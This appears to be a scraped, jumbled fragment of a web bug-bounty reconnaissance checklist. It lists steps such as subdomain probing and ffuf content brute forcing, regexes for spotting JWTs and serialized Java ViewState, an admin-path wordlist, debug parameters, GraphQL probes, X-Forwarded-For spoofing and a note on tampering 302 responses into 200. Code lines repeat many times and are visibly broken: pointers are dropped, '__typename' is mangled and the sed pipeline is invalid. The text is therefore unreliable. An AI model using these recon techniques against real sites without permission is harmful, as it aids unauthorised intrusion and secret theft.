/(\.|@)ROOT\.TLD/ AND /eyj([0-9A-Za-z]).+\.eyj([0-9A-Za-z]).+\.([0-9A-Za-z]).+/

Resolvable Subdomains AND HTTP Service

Google Search I’m Feeling Lucky

JS URLs Monitoring Secret Keys

Resolvable Subdomains AND HTTP Service

TLS subject alternative and common names

Removing CDN IPs

Probe For Working HTTP AND HTTPS Servers

for Host in `cat alive-subdomains.txt`

cat ORG-*.txt | sed -i -- 's| \[|\] \[|1' | tee -a all-ORG.txt

Content Brute Forcing

parser = argparse.ArgumentParser(description='You can run e.g. python3 grepENDPOINTS.py --directory DIR')

for directory,directoriesnames,filesnames in os.walk(args.directory):

// set default X-Forwarded-For header if not present

func (r *SimpleRunner) Dump(req *ffuf.Request) ([]byte, error) {

// set default X-Forwarded-For header if not present

Content Brute Forcing

// set default X-Forwarded-For header if not present

func (r *SimpleRunner) Dump(req *ffuf.Request) ([]byte, error) {

// set default X-Forwarded-For header if not present

Content Brute Forcing

// set default X-Forwarded-For header if not present

func (r *SimpleRunner) Dump(req *ffuf.Request) ([]byte, error) {

// set default X-Forwarded-For header if not present

500 GET 12l 31w 433c https://www.example.com/text/css

--custom-parameters admin debug _debug disable

--custom-values 1 0 false off null true yes no

func (r *SimpleRunner) Execute(req *ffuf.Request) (ffuf.Response, error) {

func (r *SimpleRunner) Dump(req *ffuf.Request) ([]byte, error) {

adminconsole-dashboard adminsystem adm/admin.html

users/signup.aspx create_account.html create_user.aspx

return requestResponse.hasResponse() &&

Change 302 Moved Temporarily To 200 OK

{"query": "query{__typename}"} query=query{__typename}

func (r SimpleRunner) Dump(req ffuf.Request) ([]byte, error) {

func (r SimpleRunner) Dump(req ffuf.Request) ([]byte, error) {

func (r SimpleRunner) Dump(req ffuf.Request) ([]byte, error) {

func (r SimpleRunner) Execute(req ffuf.Request) (ffuf.Response, error) {

func (r SimpleRunner) Dump(req ffuf.Request) ([]byte, error) {

{"query": "query{typename}"} query=query{typename}

javax.faces.ViewState ViewState(.)?H4sIAA ViewState(.)?rO0AB